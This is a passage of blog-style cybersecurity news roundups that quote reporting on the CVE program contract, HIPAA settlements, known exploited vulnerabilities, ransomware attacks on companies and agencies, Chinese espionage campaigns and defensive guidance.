    • “The RaaS model has significantly lowered the technical barriers for wannabe cybercriminals, and as such it has become a serious problem for organizations around the world.”
  • Infosecurity Magazine notes,
    • “A new ransomware strain known as ELENOR-corp, identified as version 7.5 of the Mimic ransomware, has been used in a series of targeted attacks on the healthcare sector.
    • “The campaign displays a range of advanced capabilities, including data exfiltration, persistent access and anti-forensic strategies designed to cripple recovery efforts and maximize damage.”

From the cybersecurity defenses front,

  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity

From the cybersecurity renewals, policy and law enforcement front,

  • Federal News Network reported on Tuesday,
    • “The Cybersecurity and Infrastructure Security Agency [CISA] has inked a last-minute funding extension for a key cyber vulnerability management program.
    • CISA’s contract with MITRE to manage the Common Vulnerabilities and Exposures, or CVE, program was set to expire on Wednesday. But after an outcry from the cybersecurity community, CISA executed an 11-month option period for MITRE’s contract on Tuesday night.
    • “The CVE program is invaluable to the cyber community and a priority of CISA,” a CISA spokesperson said on Wednesday. “Last night, CISA executed the option period on the contract to ensure there will be no lapse in critical CVE services. We appreciate our partners’ and stakeholders’ patience.”
    • The CVE program is a public database of known security vulnerabilities in software and hardware. It’s relied on by organizations across the world to manage cyber vulnerabilities in products and services. CISA’s “Known Exploited Vulnerabilities” database, for instance, relies on CVEs to prioritize how quickly federal agencies must patch bugs on the list.
  • Cybersecurity Dive adds,
    • “Two federal lawmakers today introduced a bipartisan bill that preserves key regulation that facilitates the sharing of cyber-threat data between private companies and the federal government. 
    • “The Cybersecurity Information Sharing Extension Act, introduced by U.S. Sens. Gary Peters (D-MI) and Mike Rounds (R-SD), would extend provisions of the Cybersecurity Information Sharing Act of 2015, which is due to expire in September. The law encourages businesses to share information about ongoing cybersecurity threats with the federal government and is one of few legislative actions that has actually had an impact on real-world cybersecurity, security experts said.
    • “Specifically, the Cybersecurity Information Sharing Act of 2015 gives incentives to companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). It does this by providing legal protections for companies that do so by providing federal antitrust exemptions and precluding them from being held accountable for state and federal disclosure laws.”
  • CISA announced,
    • “Cyber threats across the globe have put into focus our country’s need for cyber talent. CISA leads and hosts the President’s Cup Cybersecurity Competition to identify, recognize, and reward the best cyber talent across the federal workforce. Participants are challenged to outthink and outwit their competitors in a series of tests designed to expand cyber skills that are based on real-world situations.  For President’s Cup 6, participants will compete in a maximum velocity metaverse full of mayhem and taking place in a world light years ahead of our own.  
    • “Want to see what it’s like to participate in the President’s Cup? Federal employees can visit the President’s Cup Practice Area to take on challenges from previous competitions and receive a certificate of completion. Anyone can visit the President’s Cup GitHub page to find descriptions, solution guides, virtual machine builds and other artifacts from challenges featured in previous President’s Cup competitions. ” 
  • The National Institute of Standards and Technology (NIST) let us know,
    • “A draft update to the NIST Privacy Framework will enable organizations to use it seamlessly with the agency’s Cybersecurity Framework, which received its own update last year. 
    • “Targeted changes to content and structure respond to stakeholder needs and make the document easier to use.”
    • “NIST is accepting public comments on the draft via [email protected] until June 13, 2025. A template for submitting comments can be found at the NIST Privacy Framework website. Following the comment period, NIST will consider additional changes and release a final version later this calendar year.”
  • The HHS Office for Civil Rights announced on April 17,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Guam Memorial Hospital Authority (GMHA), a public hospital on the U.S. Territory, island of Guam, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule, following the receipt of two complaints alleging that the electronic protected health information (ePHI) of GMHA patients was impermissibly disclosed.” * * *
    • “Ransomware and hacking are the primary cyber-threats to electronic protected health information within the health care industry. Failure to conduct a HIPAA risk analysis puts this information at risk and vulnerable to future ransomware attacks and other cyber-threats,” said OCR Acting Director Anthony Archeval.
    • “Under the terms of the resolution agreement, GMHA agreed to implement a corrective action plan that will be monitored by OCR for three years, and paid OCR $25,000.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-recap-gmha.pdf, opens in a new tab [PDF, 228 KB]
  • Per Bleeping Computer,
    • “The FBI warns that scammers impersonating FBI Internet Crime Complaint Center (IC3) employees offer to “help” fraud victims recover money lost to other scammers.
    • “Over the last two years, between December 2023 and February 2025, the FBI said it has received over 100 reports of fraudsters using this tactic.
    • “Complainants report initial contact from the scammers can vary. Some individuals received an email or a phone call, while others were approached via social media or forums,” the law enforcement agency warned in a Friday public service announcement.”

From the cybersecurity vulnerabilities and breaches front,

  • Cyberscoop reports,
    • “A House panel has concluded that the U.S. government should double down on export controls and other tools to slow down the progress of Chinese AI companies like DeepSeek, while also preparing for a future where those efforts fail.
    • “In a report released Wednesday, the House Select Committee on the Chinese Communist Party further fleshes out the financial and technological resources that went into building DeepSeek’s R1 reasoning model, as well as its potential risks to U.S. economic and national security.
    • “The authors conclude that the DeepSeek website and app “acts as a direct channel for foreign intelligence gathering on Americans’ private data.”
  • Dark Reading adds,
    • “One of China’s major state-funded espionage groups has created or otherwise upgraded various malware programs, signaling a notable arsenal refresh that defenders need to be aware of.
    • “Mustang Panda (aka Bronze President, Stately Taurus, and TA416) is an advanced persistent threat (APT) believed to be sponsored by the People’s Republic of China (PRC). It has long been known for spying on targets of interest to the PRC, including: military and government organizations, nongovernmental organizations (NGOs), think tanks, minority groups, and corporations in major industries, primarily around East and Southeast Asia but also in the West.
    • “Recently, the group attacked an organization based in Myanmar. In the process, researchers from Zscaler uncovered four previously unknown attack tools the group is now using. They include two keyloggers, a tool for facilitating lateral movement, and a driver used to evade endpoint detection and response (EDR) software. Besides that, the group has also upgraded its signature backdoor, “Toneshell.”
  • Per Cybersecurity Dive,
    • “Lemonade Inc. has begun sending notification letters to about 190,000 people after their driver’s license numbers were transmitted unencrypted, according to regulatory filings by the company. 
    • “The company said a technical issue in its online application process for car insurance led to the exposure of data in an application programming interface call to a third-party data provider, according to an April 9 filing with the Securities and Exchange Commission
    • “As part of the online application process, certain information is sent between a server and a user’s browser, according to the filing. This includes data used to generate an insurance quote.  
    • “Lemonade said it learned of the issue on March 14 and said the exposures likely lasted from April 2023 through March 2024, according to a notice filed with the California Attorney General’s office.”
  • and
    • “Hertz Corp. confirmed a threat actor gained access to sensitive personal data in a breach linked to vulnerabilities in Cleo file-transfer software, according to a filing Friday with the Maine Attorney General’s office. 
    • “Hertz said it learned on Feb. 10 that an unauthorized third party obtained the data in connection with an attack spree that took place between October and December 2024. Hertz completed an analysis of the stolen data on April 2. 
    • “Importantly, to date, our investigation has found no evidence that Hertz’s own network was affected by this event,” a Hertz spokesperson said via email. 
  • CISA added four known exploited vulnerabilities to its catalog this week.
  • April 16, 2025
    • CVE-2021-20035 SonicWall SMA100 Appliances OS Command Injection Vulnerability
      • Cybersecurity Dive discusses this KVE here.
  • April 17, 2025
    • CVE-2025-31200 Apple Multiple Products Memory Corruption Vulnerability
    • CVE-2025-31201 Apple Multiple Products Arbitrary Read and Write Vulnerability
    • CVE-2025-24054 Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability
      • Dark Reading discusses the Apple KVEs here.
      • Hacker News discusses the Microsoft KVE here.
  • Cybersecurity Dive adds,
    • “Huntress on Monday published research that showed exploitation of CVE-2025-30406, a deserialization vulnerability in Gladinet’s CentreStack enterprise file-sharing platform for managed service providers (MSPs). The cybersecurity vendor said seven organizations were compromised via the zero-day flaw, which involves a hardcoded cryptographic key that can be used to gain remote code execution.
    • “Huntress warned that Gladinet’s Triofox product also relies on a hardcoded key and is vulnerable to CVE-2025-30406. Triofox is an on-premises file-sharing server designed for larger enterprises, according to Gladinet.
    • CISA added CVE-2025-30406 to its known exploited vulnerabilities catalog on April 9. Gladinet first disclosed the flaw on April 3 and warned that exploitation had already been observed in the wild.”

From the ransomware front,

  • Cybersecurity Dive reports,
    • “DaVita has been hit by a ransomware attack that’s affecting operations, the kidney care provider said Monday. 
    • “The dialysis company discovered the attack, which encrypted parts of its network, on Saturday, according to a securities filing. Davita then activated its response plans and isolated affected systems.
    • “The company did not disclose how its operations are being affected or how long the disruption will last, but said patient care is continuing.” 
  • and
    • “Ahold Delhaize confirmed Thursday that certain files from its U.S. operations were stolen in a November cyberattack after a threat group claimed credit for the incident.
    • “The threat group, tracked as Inc Ransom, claimed in a Wednesday post on its leak site to have up to 6 TB of sensitive data from the Netherlands-based supermarket operator’s U.S. division and threatened to release the information if its demands are not met, according to researchers at Arctic Wolf. The attackers have not said what those demands are.
    • “Since the incident was detected, our teams have been working diligently to determine what information may have been affected,” Ahold Delhaize USA said in a statement.”
  • Per Security Week,
    • “The Oregon Department of Environmental Quality (DEQ) is the regulatory agency in charge of the quality of air, land and water in the state. The organization revealed on April 9 that it had launched an investigation into a cyberattack that forced it to shut down networks as part of containment efforts.
    • “The DEQ has been issuing updates every day since, and several of the updates pointed out that the agency had found no evidence of a data breach. 
    • “The incident disrupted email and help desk services, as well as vehicle inspection stations. The agency said its environmental data management system is hosted on a separate server and has not been impacted.
    • “After the regulator’s repeated denials about suffering a data breach, the notorious Rhysida ransomware group took credit for the attack on Monday, claiming to have stolen 2.5 Tb of files, including employee data.” 
  • Bleeping Computer points out,
    • “The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices.
    • “ClickFix is a social engineering tactic where victims are tricked into executing dangerous PowerShell commands on their systems to supposedly fix an error or verify themselves, resulting in the installation of malware.
    • “Though this isn’t the first time ClickFix has been linked to ransomware infections, confirmation about Interlock shows an increasing trend in these types of threat actors utilizing the tactic.
    • “Interlock is a ransomware operation launched in late September 2024, targeting FreeBSD servers and Windows systems.
    • “Interlock is not believed to operate as a ransomware-as-a-service model. Still, it maintains a data leak portal on the dark web to increase pressure on victims, demanding payments ranging from hundreds of thousands of dollars to millions.”
  • The Register adds,
    • “Ransomware operators jack up their ransom demands by a factor of 2.8x if they detect a victim has cyber-insurance, a study highlighted by the Netherlands government has confirmed.
    • “For his PhD thesis [PDF], defended in January, Dutch cop Tom Meurs looked at 453 ransomware attacks between 2019 and 2021. He found one of the first actions intruders take is to search for documents with the keywords “insurance” and “policy.” If the crooks find evidence that the target has a relevant policy, the ransom more than doubles on average.
    • “In double-extortion attacks, where intruders threaten to publish data stolen from the victim unless the ransom is paid, those with insurance on average are quoted 5.5x more than those who don’t.” * * *
    • “According to the research, firms with a proper backup system were 27x less likely to pay criminals off, for the simple reason that they usually don’t need to. Even then, surprisingly, some do.
    • “In roughly 5 out of 100 cases in which a payment is made, victims do have the option to recover in a way other than paying, but they still choose to pay – for example to recover faster or to prevent reputational damage,” he said.
    • “In the remaining 95 cases, there is no other option to recover. In those cases, their entire IT infrastructure is broken and can no longer be repaired, making paying the ransom the only option to avoid bankruptcy.”

From the cybersecurity defenses front,

  • The American Hospital Association News tells us,
    • “The Cybersecurity and Infrastructure Security Agency April 17 released guidance to reduce risks associated with a reported breach of Oracle cloud services. CISA said the scope and impact of the breach is unconfirmed and that credentials may be exposed that could be reused across unaffiliated systems or embedded. The guidance lists recommendations for organizations and individual users to mitigate the risk of potential compromise. 
    • “This alert not only contains practical guidance to mitigate the potential breach related to Oracle but also provides valuable guidance and best practices for general cloud security,” said John Riggi, AHA national advisor for cybersecurity and risk. “Generally speaking, we continue to see that most of the cyber risk exposure that hospitals and health systems face originates from insecure third-party technologies, service providers and the supply chain. It is vitally important for mission-critical third parties to share timely threat intelligence and adversary tactics with the federal government and affected clients. This is necessary to prevent potential cyberattacks, which could compromise sensitive data and risk patient safety.” 
  • Dark Reading asks “Are We Prioritizing the Wrong Security Metrics? True security isn’t about meeting deadlines — it’s about mitigating risk in a way that aligns with business objectives while protecting against real-world threats.”
  • Cyberscoop considers whether “Ivanti is the problem or a symptom of a systemic issue with network devices? Exploited vulnerabilities have turned up in Ivanti products 16 times since 2024. That’s more than any other vendor in the network edge device space.”
  • Bleeping Computer suggests “7 Steps to Take After a Credential-Based cyberattack.”
    • “When credentials fall into the wrong hands and hackers breach your systems, every minute counts — but having a well-rehearsed incident response plan will allow you to minimize damage and recovery time.”
  • Here is a link to Dark Reading’s CISO corner.

Cybersecurity Dive

David ErmerCybersecurity

From the cybersecurity policy and law enforcement front,

  • Federal News Network tells us,
    • “The second Trump administration’s cybersecurity policy is still coming into view, but GOP lawmakers are calling for the White House to kick off a review of existing and future cyber regulations.
    • “Lawmakers and policy experts are particularly focused on three key rules: the Cybersecurity and Infrastructure Security Agency’s incident reporting requirements; the Department of Health and Human Services’ proposed update to health care security requirements; and the Securities and Exchange Commission’s 2023 cybersecurity risk management requirements.”
  • FEHBlog note — As early as April 21, federal agencies will be announcing the withdrawal of certain proposed rules, such as the HIPAA Security Rule amendments, which stripped the rule of its most important feature — flexibility, and the repeal of certain final rules under a February 19, 2025, executive order which a Presidential memorandum supplemented last Wednesday.
  • The American Hospital Association News explained on April 10,
    • The Trump administration yesterday released executive orders on reducing anti-competitive regulatory barriers and repealing certain regulations deemed unlawful.  
    • The order on reducing anti-competitive barriers directs federal agencies to review all regulations subject to their rulemaking authority and identify those that create de facto or de jure monopolies, create barriers to entry for new market participants, create or facilitate licensure or accreditation requirements that unduly limit competition, or otherwise impose anti-competitive restraints or distortions in the market.   
    • The order on repealing unlawful regulations is linked to a Feb. [19] executive order [published in the Federal Register on Feb. 25] that directed agencies within 60 days to identify unlawful and potentially unlawful regulations to be repealed. The new order instructs agencies to take steps to immediately repeal regulations and provide justification within 30 days for any identified as unlawful but have not been targeted for repeal, explaining the basis for the decision not to repeal.
  • The Mintz law firm points out that on April 7, 2025, OMB issued new guidance for the Federal Government’s use of artificial intelligence (AI), and President Trump signed an EO for AI Data Centers.
  • Security Week reports,
    • The National Institute of Standards and Technology (NIST) has announced that all CVEs published before January 1, 2018, will be marked as ‘Deferred’ in the National Vulnerability Database (NVD).
    • This means that, because the CVEs are old, NIST will no longer prioritize updating NVD enrichment or initial NVD enrichment data for them, unless they are or have been included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
    • “CVEs marked as Deferred will display a banner on their CVE Detail Pages indicating this status. This change will take place over the span of several nights. We are doing this to provide additional clarity regarding which CVE records are prioritized,” NIST announced.
    • “We will continue to accept and review requests to update the metadata provided for these CVE records. Should any new information clearly indicate that an update to the enrichment data for the CVE is appropriate, we will continue to prioritize those requests as time and resources allow,” NIST said.
  • Per an April 10, 2025, HHS press release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Northeast Radiology, P.C. (NERAD), a professional corporation that provides clinical services at medical imaging centers in New York and Connecticut, concerning potential violations of the Health Insurance Portability and Accountability Act (HIPAA) Security Rule.” * * *
    • “OCR initiated its investigation of NERAD after receiving a breach report from NERAD in March 2020 about a breach of unsecured ePHI. NERAD reported that between April 2019 and January 2020, unauthorized individuals had accessed radiology images stored on NERAD’s PACS server. NERAD notified the 298,532 patients whose information was potentially accessible on the PACS server of this breach. OCR’s investigation found that NERAD had failed to conduct an accurate and thorough risk analysis to determine the potential risks and vulnerabilities to the ePHI in NERAD’s information systems.
    • “Under the terms of the resolution agreement, NERAD agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $350,000 to OCR.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-settlement-nerad.pdf, opens in a new tab [PDF, 369 KB]

From the cybersecurity breaches and vulnerabilities front,

  • The Wall Street Journal reports,
    • “Chinese officials acknowledged in a secret December [2024] meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
    • “The Chinese delegation linked years of intrusions into computer networks at U.S. ports, water utilities, airports and other targets, to increasing U.S. policy support for Taiwan, the people, who declined to be named, said.  
    • “The first-of-its-kind signal at a Geneva summit with the outgoing Biden administration startled American officials used to hearing their Chinese counterparts blame the campaign, which security researchers have dubbed Volt Typhoon, on a criminal outfit, or accuse the U.S. of having an overactive imagination.” * * *
    • “A Chinese official would likely only acknowledge the intrusions even in a private setting if instructed to do so by the top levels of Xi’s government, said Dakota Cary, a China expert at the cybersecurity firm SentinelOne. The tacit admission is significant, he said, because it may reflect a view in Beijing that the likeliest military conflict with the U.S. would be over Taiwan and that a more direct signal about the stakes of involvement needed to be sent to the Trump administration.
    • “China wants U.S. officials to know that, yes, they do have this capability, and they are willing to use it,” Cary said.”
  • Per Bleeping Computer,
    • “Laboratory Services Cooperative (LSC) has released a statement informing it suffered a data breach where hackers stole sensitive information of roughly 1.6 million people from its systems.
    • “LSC is a Seattle-based nonprofit organization that provides centralized laboratory services to its member affiliates, including select Planned Parenthood centers.
    • “It plays a crucial role within its niche, supporting organizations in the reproductive health services across more than 35 U.S. states, handling sensitive lab testing, billing, and personal data.”
  • and
    • “Oracle finally confirmed in email notifications sent to customers that a hacker stole and leaked credentials that were stolen from what it described as “two obsolete servers.”
    • “However, the company added that its Oracle Cloud servers were not compromised, and this incident did not impact customer data and cloud services.
    • “Oracle would like to state unequivocally that the Oracle Cloud—also known as Oracle Cloud Infrastructure or OCI—has NOT experienced a security breach,” Oracle says in a customer notification shared with Bleeping Computer.”
  • and
    • “Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities.
    • “Tycoon2FA was discovered in October 2023 by Sekoia researchers, who later reported significant updates on the phishing kit that increased its sophistication and effectiveness.
    • Trustwave now reports that the Tycoon 2FA threat actors have added several improvements that bolster the kit’s ability to bypass detection and endpoint security protections.”
  • The Cybersecurity and Infrastructure Security Agency added five known exploited vulnerablities to its catalog this week.
  • CISA announced yesterday,
    • Fortinet is aware of a threat actor creating a malicious file from previously exploited Fortinet vulnerabilities (CVE-2024-21762, CVE-2023-27997, and CVE-2022-42475) within FortiGate products. This malicious file could enable read-only access to files on the device’s file system, which may include configurations. Fortinet has communicated directly with the account holders of customers identified as impacted by this issue based on the available telemetry with mitigation guidance.
    • See the following resource for more information: Analysis of Threat Actor Activity | Fortinet Blog

From the ransomware front,

  • Morphisec discusses the most notable ransomware attacks from the last six months.
  • Cybersecurity Dive informs us,
    • “Remote access tools were the initial entry point in eight of every 10 ransomware attacks in 2024, according to a report released Thursday by At-Bay. VPNs accounted for about two-thirds of ransomware attack entry points. 
    • “Indirect ransomware claims continue to rise, showing a 43% increase in 2024, according to At-Bay. Indirect ransomware is when an attack begins on a third-party vendor or business partner, often leading to a data breach or business interruption of a downstream client or partner. The report cites the 2023 MOVEit breaches and the 2024 CDK attacks
    • “Overall, the frequency of ransomware claims returned to record levels seen in 2021 after a decreased rate of attacks in 2022 and 2023, according to At-Bay.” 
  • and
    • “Sensata Technologies was struck by a ransomware attack earlier this week that disrupted several of the company’s operations, according to a regulatory filing.
    • “Sensata disclosed that a ransomware attack on Sunday encrypted certain devices on the network. The Attleboro, Mass.-based company specializes in sensors, controls and other industrial technology for the automotive, aerospace and manufacturing sectors.
    • “The incident has temporarily impacted Sensata’s operations, including shipping, receiving, manufacturing production, and various other support functions. While the company has implemented interim measures to allow for the restoration of certain functions, the timeline for a full restoration is not yet known,” Sensata said in the SEC filing.”
  • Dark Reading lets us know,
    • “While ransomware represented the costliest cyber-insurance claims in 2024, incidents of financial fraud continue to be far more numerous, with both often triggered by security failures at a third-party firm.
    • “That insight comes from the latest tranche of cyber-insurance data released this year, this time by cyber-insurance firm At-Bay. Financial fraud — most often following a phishing attack — remained the most common type of cyberattack leading to an insurance claim, according to At-Bay’s “2025 InsurSec Report,” released this week. While the cyber insurer saw 16% more claims in 2024 than the year before, the overall cost of each incident declined to $166,000, down from $213,000 in 2021.”
  • Microsoft Security explains how cyber attackers exploit domain controllers using ransomware.
  • CSO in a commentary article notes,
    • “If you didn’t pay much attention to news of the recent Codefinger ransomware attack, it’s probably because ransomware has become so prevalent that major incidents no longer feel notable.
    • “But Codefinger is not just another ransomware breach to add to the list of incidents where businesses lost sensitive data to attackers. In key respects, Codefinger represents a substantially new type of ransomware attack.
    • “By extension, the incident is a reminder of why conventional cybersecurity techniques won’t always protect businesses and their data — and why organizations need to think beyond the basics regarding defending against ransomware.”
  • Tech Target discusses best practices on reporting ransomware attacks.

From the cybersecurity defenses front,

  • Security Week notes,
    • “As the threat landscape grows more sophisticated, Chief Information Security Officers (CISOs) are continuously searching for innovative ways to safeguard their organizations. Yet one of the most potent tools in their arsenal remains underutilized – DNS (domain name systems).”
  • An ISACA blog entry discusses how to build AI governance by design.
  • Per Bleeping Computer,
    • “Microsoft is testing a new Defender for Endpoint capability that will block traffic to and from undiscovered endpoints to thwart attackers’ lateral network movement attempts.
    • “As the company revealed earlier this week, this is achieved by containing the IP addresses of devices that have yet to be discovered or onboarded to Defender for Endpoint.
    • “Redmond says the new feature will prevent threat actors from spreading to other non-compromised devices by blocking incoming and outgoing communication with devices using contained IP addresses.”
  • Here is a link to Dark Reading’s CISO Corner.
OSZAR »